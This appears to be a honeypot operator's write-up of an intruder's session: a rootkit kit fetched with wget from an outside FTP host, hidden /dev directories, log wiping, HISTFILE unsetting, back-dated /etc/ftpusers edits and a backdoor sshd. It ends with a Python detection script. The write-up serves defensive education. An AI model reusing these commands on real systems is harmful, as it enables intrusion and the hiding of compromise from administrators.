Cinder

The third kiddie to enter my realm calls himself Cinder. He seems to be an Italian kiddo.

On July 7th, at 19:55, Cinder connects to port 21 of my honeypot. After running the 7530wurm exploit (see the page about MiCrobul) which gave him immediate root-access, he grabs a .tgz file from his ftp-space at interfree.it.

unset HISTFILE
w
12:30am up 4:55, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
cd /dev/
mkdir ".. cin"
cd ".. cin"
pwd
/dev/.. cin
wget ftp://CinderVII:CENSORED@213.158.72.39/akit.tar.gz
pwd
/dev/.. cin
ls
ftp 213.158.72.39
CinderVII
CENSORED
get akit.tar.gz
quit
tar zxvf akit.tar.gz
...

After untarring the kit he installs it with a simple ./install. It contains trojanned binaries 'crontab', 'df', 'dir', 'du', 'find', 'vdir', 'ifconfig', 'in.telnetd', 'killall', 'ls', 'netstat', 'ps', 'pstree', 'syslogd' and 'tcpd', a backdoor SSHD and the Adore kernel module.

'akit' stands for Akira kit, from the install:

# Hello.
# This rootkit it's very fast. That don't have a stealth backdoor..
# i dedicated this rootkit to akira my very best friends for now....
# for now, why i don't never have best frined's...
# sorry for my bad english...i don't study at school :P
#
# 15 may 2002
# product Akira`
# write by master`

As you can see, it was written just a few months ago. I will put it online in a few days for your education. Anyway.. with this installed all his incoming telnet and ssh connections are invisible, as are his psybnc, eggdrop, dsniff, sshd, etc. Let's take a look at the logs I keep hidden from him >:)

At 20:17, not much after cracking the box, Cinder connects to his backdoor sshd on port 20673:

[root@hostname /root]# unset HISTFILE
[root@hostname /root]# cd /dev/".. cin"
[root@hostname .. cin]# ls
akit akit.tar.gz ava cl illusion sysinfo
[root@hostname .. cin]# ./illusion 195
illusion (v6) - the mirror game

usage ./illusion <string/ip/user> <on/off>

[root@hostname .. cin]# ./illusion 195 on

First, he hides his tracks by unsetting the shell's history file and running 'illusion'. Illusion is a shell script which cleans logs; Cinder used it to remove every logged line containing '195'. After covering his tracks he checks whether his connection and processes are hidden:

[root@hostname .. cin]# netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 8 [ ] DGRAM 303 /dev/log
unix 0 [ ] DGRAM 5216
unix 0 [ ] DGRAM 4814
unix 0 [ ] DGRAM 532
unix 0 [ ] DGRAM 500
unix 0 [ ] DGRAM 443
unix 0 [ ] DGRAM 392
unix 0 [ ] DGRAM 326
unix 0 [ ] DGRAM 315

[root@hostname .. cin]# ps -aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1120 68 ? S Jul07 0:04 init [3]
root 2 0.0 0.0 0 0 ? SW Jul07 0:00 [kflushd]
root 3 0.0 0.0 0 0 ? SW Jul07 0:02 [kupdate]
root 4 0.0 0.0 0 0 ? SW Jul07 0:00 [kpiod]
root 5 0.0 0.0 0 0 ? SW Jul07 0:00 [kswapd]
root 6 0.0 0.0 0 0 ? SW< Jul07 0:00 [mdrecoveryd]
root 256 0.0 0.0 0 0 ? SW Jul07 0:00 [lockd]
root 257 0.0 0.0 0 0 ? SW Jul07 0:00 [rpciod]
root 266 0.0 0.0 1156 0 ? SW Jul07 0:00 [rpc.statd]
root 280 0.0 0.0 1104 0 ? SW Jul07 0:00 [apmd]
root 331 0.0 0.2 1172 336 ? S Jul07 0:00 syslogd -m 0
root 340 0.0 0.1 1500 172 ? S Jul07 0:00 klogd
...

No kiddo can ever hack a box without installing some IRC-related programs. Cinder just neeeeds his eggdrops.

[root@hostname .. cin]# wget ftp://CinderVII:CENSORED@213.158.72.39/eggdrop1.6.2.tar.gz
bash: wget: command not found
[root@hostname .. cin]# lynx ftp://CinderVII:CENSORED@213.158.72.39/eggdrop1.6.2.tar.gz
...

After configuring the just-downloaded eggdrop he tries to run it:

[root@hostname eggdrop1.6.2] # ./eggdrop -m eggdrop2
./eggdrop: error in loading shared libraries: libtcl.so: cannot open shared object file: No such file or directory

Too bad dude, no tcl around. No worries for Cinder, he continues his siege just as if the eggdrop were running fine. Not that running eggdrops has high priority when wu-ftpd is still vulnerable.

[root@hostname eggdrop1.6.2]# cd ..
[root@hostname .. cin]# cp -f /etc/ftpusers /dev/ftppatch
[root@hostname .. cin]# echo "ftp" >>/dev/ftppatch
[root@hostname .. cin]# echo "anonymous" >>/dev/ftppatch
[root@hostname .. cin]# touch -acmr /etc/ftpusers /dev/ftppatch
[root@hostname .. cin]# mv -f /dev/ftppatch /etc/ftpusers
[root@hostname .. cin]#
[root@hostname .. cin]#
[root@hostname .. cin]#
[root@hostname .. cin]# ls
akit akit.tar.gz ava cl eggdrop1.6.2 eggdrop1.6.2.tar.gz illusion sysinfo
[root@hostname .. cin]# cd akit
[root@hostname akit]# ls
bin install.patch.fr install.patch.rpmfind logo
install install.patch.fr2 install.patch.speakeasy patchssh
[root@hostname akit]# ./install.patch.rpmfind
Retrieving ftp://194.199.20.114/linux/redhat/updates/6.1/en/os/i386/wu-ftpd-2.6.0-14.6x.i386.rpm
wu-ftpd ##################################################
Retrieving ftp://194.199.20.114/linux/redhat/6.2/en/os/i386/RedHat/RPMS/imap-4.7-5.i386.rpm
imap ##################################################
Retrieving ftp://194.199.20.114/linux/redhat/updates/6.2/en/os/i386/bind-8.2.3-0.6.x.i386.rpm
bind ##################################################
[root@hostname akit]# ./patchssh
which: no sshd1 in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/bin)
which: no sshd in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/bin)

How nice, he fixes my broken wu-ftpd. I should be very thankful for that. No sshd, imapd or bind to patch though. Anyway, now he's safe. Time to install psybnc!

[root@hostname .. cin]# lynx ftp://CinderVII:CENSORED@213.158.72.39/psyBNC2.2.1-linux-i86-static.tar.gz
...
[root@hostname .. cin]# tar zxvf psyBNC2.2.1-linux-i86-static.tar.gz
...
[root@hostname .. cin]# cd psybnc
[root@hostname psybnc]# ls
CHANGES COPYING FAQ Makefile README TODO help log menuconf motd psybnc psybncchk scripts tools
[root@hostname psybnc]# make
Running Conversion-Tool for older psyBNC-Versions.
This is a precompiled linux-glibc2 static version of psybnc.
-rwxrwxr-x 1 root root 533616 Oct 28 2000 psybnc
done.

[root@hostname psybnc]# pico psybnc.conf
...
[root@hostname psybnc]# ./psybnc
...

Well.. that's that. A running psybnc connected to IRCnet. The channel he's on seems to be a private channel where he stores his bouncers and eggdrops. Mighty useful if you ask me. Of course he needs to check whether his newly cracked box can run mirkforces too. Well, sorry, it won't work. First, I don't forward incoming packets for any other addresses in the honeypot's subnet. Secondly, my ISP's router won't even know those extra 252 IPs are there, since the box is on my LAN. Third, I firewall.


It's July 8th, 17:36 CEST now, I just read the mail abuse@interfree.it sent me as a reply to my abuse-mail about Cinder's hacking tools stored on their FTP. This was the reply:

(sorry for my poor english)

This user has been removed.

Distinti Saluti
Interfree SpA

Let's hope he doesn't have a backup :)

... I've put up a page which explains some tools Cinder uses. It takes a lot of time to 'analyse' them, so there's not much to see just now. But anyway, here's the page, have fun.

(July 15th, 20:47 CEST. Just a note that I'm still updating the explanation of Cinder's tools. You can see some stuff about a rootkit for IRIX there now, as well as other things. I also got a mail back from Cinder's ISP. I quote: due disciplinary measures about our customer are on the way. )

(July 15th, 23:40 CEST. Wrote a little explanation about edenkitbsd.tar.gz).


I think honeypot 2 was a success. I got hold of many tools the standard scriptkiddie uses, pestered the kiddo a bit, and had fun. I think the explanations you can read on this page may be useful for those who don't know much about how kiddies operate. Besides that, I wasn't able to find much info on Google about the kits I explained, which means I might well be the first to explain them. Not that I want to be the first to boost my ego, no; it might be useful for other people to learn and do something with that knowledge. With simple counter-measures this hack would easily be detected. Now if only all sysadmins had some clue..
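As an added example (not the author's code, nor any tool from the kit), this Python script checks for two of the tricks visible in the session logs above: the '.. cin' directory created under /dev, and the rewrite of /etc/ftpusers that used 'touch -acmr' to copy the original timestamps onto the edited copy. touch can set atime and mtime, but ctime is always stamped by the kernel, so a file whose ctime is well past its mtime has been rewritten and back-dated. The script replays both tricks in a constructed temporary tree, so all paths and file contents are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path

# Device nodes never start with a dot or contain whitespace; '.. cin' does both.
SUSPICIOUS_NAME = re.compile(r"^\.|\s")

def hidden_dirs(dev_dir):
    """Subdirectories of dev_dir whose names look like rootkit hideouts."""
    return sorted(p.name for p in Path(dev_dir).iterdir()
                  if p.is_dir() and SUSPICIOUS_NAME.search(p.name))

def timestamp_mismatch(path, slack=2):
    """True when ctime is later than mtime by more than slack seconds.
    'touch -acmr original copy' copies atime/mtime only; the kernel stamps
    a fresh ctime on the utime call and on the final 'mv', so the two drift."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack

def simulate_ftppatch(etc_dir):
    """Replay the session's edit of /etc/ftpusers harmlessly inside a temp tree."""
    ftpusers = Path(etc_dir) / "ftpusers"
    ftpusers.write_text("root\nbin\ndaemon\n")
    old = 1_000_000_000                  # constructed: an old atime/mtime
    os.utime(ftpusers, (old, old))
    patch = Path(etc_dir) / "ftppatch"   # cp -f /etc/ftpusers /dev/ftppatch
    patch.write_text(ftpusers.read_text() + "ftp\nanonymous\n")
    os.utime(patch, (old, old))          # touch -acmr /etc/ftpusers /dev/ftppatch
    patch.replace(ftpusers)              # mv -f /dev/ftppatch /etc/ftpusers
    return ftpusers

def demo():
    """Build a constructed /dev and /etc, run both checks, return the findings."""
    root = Path(tempfile.mkdtemp())
    dev, etc = root / "dev", root / "etc"
    dev.mkdir(); etc.mkdir()
    (dev / ".. cin").mkdir()             # the hideout from the session
    (dev / "null").touch()               # an ordinary-looking entry (a file here)
    (dev / "shm").mkdir()                # a legitimate directory name
    ftpusers = simulate_ftppatch(etc)
    untouched = etc / "hosts"            # written once, never back-dated
    untouched.write_text("127.0.0.1 localhost\n")
    return hidden_dirs(dev), timestamp_mismatch(ftpusers), timestamp_mismatch(untouched)

if __name__ == "__main__":
    print(demo())   # ([".. cin"], True, False)
```

Run against a real box the same checks want a known-good baseline (ctime/mtime of every file in /etc and /bin recorded at install time) rather than a fresh temp tree.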